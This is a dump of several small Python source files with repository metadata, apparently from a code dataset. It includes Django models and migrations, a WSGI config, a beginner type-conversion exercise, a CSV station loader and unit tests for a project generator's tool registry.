5f8310c28b3faf567c45612da76c07359c89c3b8 | e503aff4954d3a2d23a8b35a13055b71dfe9b2bb | /apps/users/models.py | 6cc43f8aef9f37d062de5fa778dee8c3db4165aa | [] | no_license | llzz-code/guliedu | 8dbf7736b7c66a7370f2c496aa04f5bc228ff618 | 65ef8123666fc50d03227183f848a712aae75742 | refs/heads/master | 2023-04-23T03:16:33.556364 | 2021-05-06T14:01:08 | 2021-05-06T14:01:08 | 364,911,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,476 | py | from datetime import datetime
from django.db import models
from django.contrib.auth.models import AbstractUser
# Create your models here.
class UserProfile(AbstractUser):
    """Custom user model extending Django's AbstractUser with profile data."""
    # Avatar image, stored under MEDIA_ROOT/user/.
    image = models.ImageField(upload_to='user/', max_length=200, verbose_name='用户头像',
                              null=True, blank=True)
    nick_name = models.CharField(max_length=20, verbose_name='用户昵称',
                                 null=True, blank=True)
    birthday = models.DateField(verbose_name='用户生日',
                                null=True, blank=True)
    gender = models.CharField(choices=(('girl', '女'), ('boy', '男')), max_length=10, verbose_name='性别',
                              default='girl')
    address = models.CharField(max_length=100, verbose_name='用户地址',
                               null=True, blank=True)
    phone = models.CharField(max_length=11, verbose_name='用户手机',
                             null=True, blank=True)
    # Activation flag checked by the login flow — presumably set after the
    # e-mail verification step; TODO confirm against the views.
    is_start = models.BooleanField(default=False, verbose_name='是否激活')
    add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')
    def __str__(self):
        return self.username
    def get_msg_counter(self):
        """Return the number of this user's unread messages."""
        # Imported here rather than at module level, presumably to avoid a
        # circular import with the operations app — confirm before moving.
        from operations.models import UserMessage
        counter = UserMessage.objects.filter(message_man=self.id, message_status=False).count()
        return counter
    class Meta:
        verbose_name = verbose_name_plural = '用户信息'
class BannerInfo(models.Model):
    """Carousel banner shown on the front page: an image linking to a URL."""
    image = models.ImageField(upload_to='banner/', verbose_name='轮播图', max_length=200)
    url = models.URLField(default='http://www.atguigu.com', verbose_name='图片链接', max_length=200)
    add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')
    def __str__(self):
        # ImageField has no natural str; show the stored file path.
        return str(self.image)
    class Meta:
        verbose_name_plural = verbose_name = '轮播图'
class EmailVerifyCode(models.Model):
    """One-time e-mail verification code for register/forget/change flows."""
    code = models.CharField(max_length=50, verbose_name='邮箱验证码')
    email = models.EmailField(max_length=200, verbose_name='验证码邮箱')
    # 1 = register, 2 = forget password, 3 = change e-mail.
    send_type = models.IntegerField(choices=((1, 'register'), (2, 'forget'), (3, 'change')), verbose_name='验证类型')
    add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')
    def __str__(self):
        return str(self.code)
    class Meta:
        verbose_name_plural = verbose_name = '邮箱验证码'
"220038123@qq.com"
] | 220038123@qq.com |
4dcd98965902046d08fe0ec9b6ba5083c262834f | 4cd32e547501354579cc5d9e3e51c2b0909aeeb9 | /django_number_place/project/wsgi.py | e4b9070482b55349b12d6a5e50e3d6587c0d41a7 | [
"BSD-2-Clause"
] | permissive | shun-tucorin/django_number_place | a48afc9bd81073a615a80e453a38bbe928a62bed | ab7bdbe565db99aedd54c5ef9ae7a73e71cb28d1 | refs/heads/master | 2021-06-24T12:33:35.229727 | 2020-08-15T04:58:38 | 2020-08-15T04:58:38 | 187,583,061 | 0 | 0 | BSD-2-Clause | 2020-08-15T04:58:39 | 2019-05-20T06:47:11 | Python | UTF-8 | Python | false | false | 444 | py | # coding: utf-8
"""
WSGI config for django_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at this project's settings module before building the app.
os.environ.setdefault(
    'DJANGO_SETTINGS_MODULE',
    'django_number_place.project.settings'
)
# WSGI entry point used by the application server (gunicorn, mod_wsgi, ...).
application = get_wsgi_application()
| [
"shun@tucorin.com"
] | shun@tucorin.com |
bbb7b44037265955881795a78d55ac9943a28368 | 77eeea2381bef9e7b24cbe8c5b86943a97f6a8a4 | /1) перменные , типы, преобразование/b) преобразование.py | 46a735fc6e114bb345e943d1c550d9600f3b09ca | [] | no_license | librabrain/geekbrains | 4102dab703bbd817910c2bd3d4c1e4fac6c9b866 | d4b3b4e34baf7eefe63762e0015035530eca221c | refs/heads/master | 2020-06-19T03:02:48.635375 | 2019-08-15T19:19:07 | 2019-08-15T19:19:07 | 196,540,918 | 0 | 0 | null | 2019-08-08T14:29:17 | 2019-07-12T08:31:53 | Python | UTF-8 | Python | false | false | 582 | py | # цифра 1988 преобразовалась в строку за счёт ковычек! была int, стала str
# The quotes make this a str, not an int.
birthday_year = '1988'
print(type(birthday_year))
period = 20
print(type(period))
# Convert the "birthday_year" string to a number before adding.
age = int(birthday_year) + period
print(age)
# Adding two strings is concatenation; first convert the number "period" to a string.
some_str = birthday_year + str(period)
print(some_str)
| [
"azat.znahar@yandex.ru"
] | azat.znahar@yandex.ru |
3ec670a221bf562518bbc440d17e1db559a4596f | 908a4dc5ffb3fdad014e483df88f6573d54ceb06 | /object_test.py | b8d17d4cb7b2d14bf34143250a643d4f648e29b8 | [] | no_license | CullenDolan/supergrid | d702bdcc94746fe2de9c8b0be782da0e9ddc2fbf | a791b7fa48928e264ef4d2bdc1fe0f0963944fdb | refs/heads/main | 2023-03-31T14:56:58.440336 | 2021-04-07T14:55:56 | 2021-04-07T14:55:56 | 334,480,937 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | from datetime import datetime
class location:
    """A hospital room location (building / floor / pod / room)."""
    def __init__(self, loc_id, hospital, building, floor, pod, room, created_at, updated_at):
        self.loc_id = loc_id
        self.hospital = hospital
        self.building = building
        self.floor = floor
        self.pod = pod
        self.room = room
        # Fix: honor the caller-supplied timestamp; the original silently
        # discarded the created_at argument and used datetime.now() instead.
        self.created_at = created_at
        self.updated_at = updated_at
# Sample locations; print(loc1) shows the default object repr because the
# class defines no __repr__/__str__.
loc1 = location(1, 'LURIE', 'MAIN', 12, 'A', 120, datetime.now(), 'NULL')
loc2 = location(2, 'LURIE', 'C-D', 3, 'C', 10, datetime.now(), 'NULL')
print(loc1)
print(loc1.building)
print(loc2.created_at)
class resource:
    """A clinical staff resource (provider) with identifying info.

    Note: the historical parameter spelling "deptartment" is kept because
    callers may rely on it as a keyword and the attribute name matches.
    """
    def __init__(self, user_id, hospital, deptartment, division, f_name, m_initial, l_name, email, created_at,
                 epic_id=None, npi=None):
        self.user_id = user_id
        self.hospital = hospital
        self.deptartment = deptartment
        self.division = division
        # Fix: epic_id and npi were referenced without being parameters,
        # so every instantiation raised NameError.  They are now optional
        # keyword arguments (backward-compatible with existing callers).
        self.epic_id = epic_id
        self.npi = npi
        self.f_name = f_name
        self.m_initial = m_initial
        self.l_name = l_name
        self.email = email
        # Fix: honor the caller-supplied timestamp instead of discarding it.
        self.created_at = created_at
# Sample resources exercising the constructor, then a field access.
user1 = resource(1, 'LURIE', 'PEDIATRICS', 'CARDIOLOGY', 'CULLEN', 'B', 'DOLAN', 'cullen@gmail.com', datetime.now())
user2 = resource(2, 'LURIE', 'SURGERY', 'NEUROSURGERY', 'EMILY', 'K', 'RYAN', 'emily@gmail.com', datetime.now())
print(user1.division)
"cullen.dolan@gmail.com"
] | cullen.dolan@gmail.com |
6e18893137c3c85ef8e273ad56b8170fbe604a00 | e2b9873da7723ef8ae505c4286e4eccbf7416315 | /leagueofclass/cadastros/migrations/0013_remove_atividadesprofessor_teste.py | aca869bbd971ba5dda0a5981a69d7e9f85b5439c | [] | no_license | lucaasaragao/LOC_PAS | 94fc50dd429ce2e9ec71cebdd748f3ff9df1ceac | 22939ab9f7b54ddc6355dce11e55e801e9501327 | refs/heads/master | 2020-03-27T17:57:57.824525 | 2018-11-01T05:22:20 | 2018-11-01T05:22:20 | 146,888,554 | 0 | 1 | null | 2018-10-31T21:37:59 | 2018-08-31T12:23:48 | CSS | UTF-8 | Python | false | false | 349 | py | # Generated by Django 2.0.7 on 2018-09-28 04:37
from django.db import migrations
class Migration(migrations.Migration):
    # Auto-generated Django migration: drops the 'teste' field added by
    # migration 0012.  Avoid hand-editing generated migrations.
    dependencies = [
        ('cadastros', '0012_atividadesprofessor_teste'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='atividadesprofessor',
            name='teste',
        ),
    ]
| [
"osvaldo_cavalcanti_filho@hotmail.com"
] | osvaldo_cavalcanti_filho@hotmail.com |
949a40f08219de6af67b53382126fda378d6d49a | 118a9f667f9b588128543a3004fe2a5a96800c77 | /data_initializer/stations.py | 7fb10d50691f55e6515b940429950c906fbb6c38 | [
"MIT"
] | permissive | hemu243/ev-charging-station | 976815cb5fdce28213628eddfda880fcdeaa71c7 | 25f34a4e8fc886c9504235af1a69cbfcb57acf73 | refs/heads/master | 2020-03-11T05:06:11.637883 | 2018-04-17T00:11:40 | 2018-04-17T00:11:40 | 129,793,429 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,506 | py | import os
from data_initializer import SingletonClass, csv_reader
class Stations(object):
    """
    A class which hold existing stations information like address, latitude and longitude etc..
    """
    # Column names expected in resources/alt_fuel_stations.csv.
    FUEL_TYPE = "Fuel Type Code"
    STREET = "Street Address"
    CITY = "City"
    STATE = "State"
    ZIP = "ZIP"
    LAT = "Latitude"
    LONG = "Longitude"
    # Derived field assembled from street/city/state/zip.
    FULL_ADDRESS = "Full Address"
    def __init__(self):
        """
        Initialized existing gas or EV stations
        """
        current_path = os.path.abspath(os.path.dirname(__file__))
        # SingletonClass presumably memoizes one CSVReader per process so the
        # file is parsed only once — TODO confirm its semantics.
        singleton_csv_reader = SingletonClass(csv_reader.CSVReader)
        self.resource_folder = os.path.join(current_path, "..", "resources")
        # Store csv reader reference
        self.csv_reader_instance = singleton_csv_reader(os.path.join(self.resource_folder, "alt_fuel_stations.csv"))
        self.simplified_csv = []
        self.fields_to_save = [Stations.FUEL_TYPE, Stations.STREET, Stations.CITY,
                               Stations.STATE, Stations.ZIP, Stations.LONG, Stations.LAT]
    def simplified_data(self):
        """
        Read csv data and simplified as well for better usages
        :return: list of simplified data
        """
        # NOTE(review): results are appended to self.simplified_csv without
        # clearing it first, so calling this twice duplicates every row.
        self.csv_reader_instance.read_csv()
        for cdata in self.csv_reader_instance.csv_data:
            data = {}
            for field in self.fields_to_save:
                data[field] = cdata[field]
            full_address = "{0} {1} {2} {3}".format(data[Stations.STREET], data[Stations.CITY],
                                                    data[Stations.STATE], data[Stations.ZIP])
            data[Stations.FULL_ADDRESS] = full_address
            self.simplified_csv.append(data)
        return self.simplified_csv
| [
"hchoudhary@splunk.com"
] | hchoudhary@splunk.com |
5a7ce41b86192e873f4f74e36bf5cb0aca5edb9f | 599529d4f64f35a6248f64473121d61d05c1ef8e | /linkloving_product_multi_selection/controllers/controllers.py | 08f8d8b7e11b2aa8d6ac656df80b30592f9e2a6d | [] | no_license | iverson2937/linklovingaddons | 2670ad16297abfbc94c883afc65b4f2082e7df0c | eea92d44bee76053619be00aa601b1efc4249589 | refs/heads/master | 2021-01-13T09:44:33.002594 | 2017-04-06T07:07:25 | 2017-04-06T07:07:25 | 72,824,679 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,101 | py | # -*- coding: utf-8 -*-
from odoo import http
# class LinklovingProductMultiSelection(http.Controller):
# @http.route('/linkloving_product_multi_selection/linkloving_product_multi_selection/', auth='public')
# def index(self, **kw):
# return "Hello, world"
# @http.route('/linkloving_product_multi_selection/linkloving_product_multi_selection/objects/', auth='public')
# def list(self, **kw):
# return http.request.render('linkloving_product_multi_selection.listing', {
# 'root': '/linkloving_product_multi_selection/linkloving_product_multi_selection',
# 'objects': http.request.env['linkloving_product_multi_selection.linkloving_product_multi_selection'].search([]),
# })
# @http.route('/linkloving_product_multi_selection/linkloving_product_multi_selection/objects/<model("linkloving_product_multi_selection.linkloving_product_multi_selection"):obj>/', auth='public')
# def object(self, obj, **kw):
# return http.request.render('linkloving_product_multi_selection.object', {
# 'object': obj
# }) | [
"357346640@qq.com"
] | 357346640@qq.com |
41198becb05ab22236b9b3bdf21e9420dac201c3 | bf3e0c392b198dee8ca2c0d192ba335634e49841 | /TOS_Pyramid/urls.py | 0e63dc5b8ce10b3f1a1974067f4b5f55350f58b6 | [] | no_license | swolfod/TOS_Promotions | 88b6b652a2697d1f72591c1d24ee0387b564b834 | b856a69f50be4d1339591d2314c04f0186ab8023 | refs/heads/master | 2020-06-14T10:54:44.850828 | 2016-12-19T15:10:48 | 2016-12-19T15:10:48 | 75,193,124 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,555 | py | """TOS_Pyramid URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import *
from .views import *
from WechatApi.views import mpAuthCallback
# Route table: admin pages, AJAX endpoints, promotion flows, and the
# WeChat OAuth callback.  View callables come from the wildcard import of
# .views above; the name= strings mirror the dotted view paths.
urlpatterns = [
    url(r'^wechat/', include('WechatApi.urls')),
    url(r'^admin/login/$', adminAuth, name="TOS_Pyramid.views.adminAuth"),
    url(r'^admin/$', admin, name="TOS_Pyramid.views.admin"),
    url(r'^admin/exports/$', exportPromotions, name="TOS_Pyramid.views.exportPromotions"),
    url(r'^search-organization/$', ajSearchOrganization, name="TOS_Pyramid.views.ajSearchOrganization"),
    url(r'^apply-tos/(\w+)/$', applyTOSBeta, name="TOS_Pyramid.views.applyTOSBeta"),
    url(r'^approve-application/$', ajApproveApplication, name="TOS_Pyramid.views.ajApproveApplication"),
    url(r'^bind-code/(\w+)/$', bindCode, name="TOS_Pyramid.views.bindCode"),
    url(r'^share/(\d+)/$', shareCode, name="TOS_Pyramid.views.shareCode"),
    url(r"^auth/wechat/$", mpAuthCallback, name="PortalWechatCallback"),
]
"swolfod@gmail.com"
] | swolfod@gmail.com |
fe248a58af72904eff8d0fedd647865fd6adbf8c | 730e19d657be1021911189976140ab149ecd43ef | /tests/test_tools_supported.py | 95a053c3fe802f02cc02067f90a8bd1cbcafde3d | [
"Apache-2.0"
] | permissive | theotherjimmy/project_generator | f0368e9200d6d0f1c58061111889f5b8077b2766 | 38293572bb67ce86c365f1422ed71f50e98bff44 | refs/heads/master | 2020-05-01T04:28:51.467962 | 2016-05-17T12:29:54 | 2016-05-17T12:29:54 | 59,320,642 | 0 | 0 | null | 2016-05-20T19:23:23 | 2016-05-20T19:23:23 | null | UTF-8 | Python | false | false | 4,421 | py | # Copyright 2015 0xc0170
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import TestCase
from project_generator.tools_supported import ToolsSupported
from project_generator.tools.uvision import Uvision
from project_generator.tools.iar import IAREmbeddedWorkbench
from project_generator.tools.coide import Coide
from project_generator.tools.gccarm import MakefileGccArm
from project_generator.tools.eclipse import EclipseGnuARM
from project_generator.tools.sublimetext import SublimeTextMakeGccARM
from project_generator.tools.cmake import CMakeGccArm
from project_generator.tools.visual_studio import VisualStudioMakeGCCARM, VisualStudioGDB
class TestProject(TestCase):
    """test things related to the ToolsSupported class"""
    def setUp(self):
        # Fresh registry instance per test.
        self.tools = ToolsSupported()
    def tearDown(self):
        pass
    def test_tools(self):
        """Each canonical tool name resolves to its exporter class."""
        tool = self.tools.get_tool('uvision4')
        assert tool == Uvision
        tool = self.tools.get_tool('iar')
        assert tool == IAREmbeddedWorkbench
        tool = self.tools.get_tool('coide')
        assert tool == Coide
        tool = self.tools.get_tool('gcc_arm')
        assert tool == MakefileGccArm
        tool = self.tools.get_tool('eclipse_make_gcc_arm')
        assert tool == EclipseGnuARM
        tool = self.tools.get_tool('sublime_make_gcc_arm')
        assert tool == SublimeTextMakeGccARM
        tool = self.tools.get_tool('cmake_gcc_arm')
        assert tool == CMakeGccArm
        tool = self.tools.get_tool('visual_studio_make_gcc_arm')
        assert tool == VisualStudioMakeGCCARM
    def test_alias(self):
        """Aliases map to the same exporter class as their canonical name."""
        tool = self.tools.get_tool('uvision')
        assert tool == Uvision
        tool = self.tools.get_tool('iar')
        assert tool == IAREmbeddedWorkbench
        tool = self.tools.get_tool('make_gcc')
        assert tool == MakefileGccArm
        tool = self.tools.get_tool('gcc_arm')
        assert tool == MakefileGccArm
        tool = self.tools.get_tool('sublime_text')
        assert tool == SublimeTextMakeGccARM
        tool = self.tools.get_tool('sublime')
        assert tool == SublimeTextMakeGccARM
        tool = self.tools.get_tool('visual_studio')
        assert tool == VisualStudioMakeGCCARM
        tool = self.tools.get_tool('eclipse')
        assert tool == EclipseGnuARM
    def test_toolnames(self):
        """get_toolnames/get_toolchain return the expected name groupings."""
        names = self.tools.get_toolnames('uvision')
        assert 'uvision' == names[0]
        toolchain = self.tools.get_toolchain('uvision')
        assert 'uvision' == toolchain
        names = self.tools.get_toolnames('uvision4')
        assert 'uvision' == names[0]
        toolchain = self.tools.get_toolchain('uvision4')
        assert 'uvision' == toolchain
        names = self.tools.get_toolnames('iar_arm')
        assert 'iar_arm' == names[0]
        toolchain = self.tools.get_toolchain('iar_arm')
        assert 'iar' == toolchain
        names = self.tools.get_toolnames('coide')
        assert 'coide' == names[0]
        toolchain = self.tools.get_toolchain('coide')
        assert 'gcc_arm' == toolchain
        names = self.tools.get_toolnames('make_gcc_arm')
        assert 'make_gcc_arm' == names[0]
        toolchain = self.tools.get_toolchain('make_gcc_arm')
        assert 'gcc_arm' == toolchain
        names = self.tools.get_toolnames('eclipse_make_gcc_arm')
        assert 'eclipse_make_gcc_arm' == names[0]
        toolchain = self.tools.get_toolchain('eclipse_make_gcc_arm')
        assert 'gcc_arm' == toolchain
        names = self.tools.get_toolnames('sublime_make_gcc_arm')
        assert 'sublime_make_gcc_arm' == names[0]
        toolchain = self.tools.get_toolchain('sublime_make_gcc_arm')
        assert 'gcc_arm' == toolchain
        names = self.tools.get_toolnames('cmake_gcc_arm')
        assert 'cmake_gcc_arm' == names[0]
        toolchain = self.tools.get_toolchain('cmake_gcc_arm')
        assert 'gcc_arm' == toolchain
| [
"c0170@rocketmail.com"
] | c0170@rocketmail.com |
de3cfa892809354f4a40f6130fb666da36aed795 | e360c04043bf7e1ac7158f508c39f7ea7fa2f9b3 | /Content/migrations/0001_initial.py | 1af820a3032eaed33db1cd27391e50fdb3b08bfe | [] | no_license | kinetiz/testapp | 875253650e54abfa598a4e60b50535b8bc341ce9 | 848f82d2aacb11ef01d3b7f096154626eeab4029 | refs/heads/master | 2021-09-28T23:32:11.949088 | 2019-12-05T13:49:50 | 2019-12-05T13:49:50 | 226,079,949 | 0 | 0 | null | 2021-09-22T18:05:15 | 2019-12-05T10:52:02 | Python | UTF-8 | Python | false | false | 615 | py | # Generated by Django 3.0 on 2019-12-03 14:15
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated initial migration creating the 'form' table.
    # Avoid hand-editing generated migrations.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='form',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('attraction_name', models.CharField(max_length=255)),
                ('description', models.TextField()),
                ('is_landmark', models.BooleanField(default=False)),
            ],
        ),
    ]
| [
"thanadon.f@gmail.com"
] | thanadon.f@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.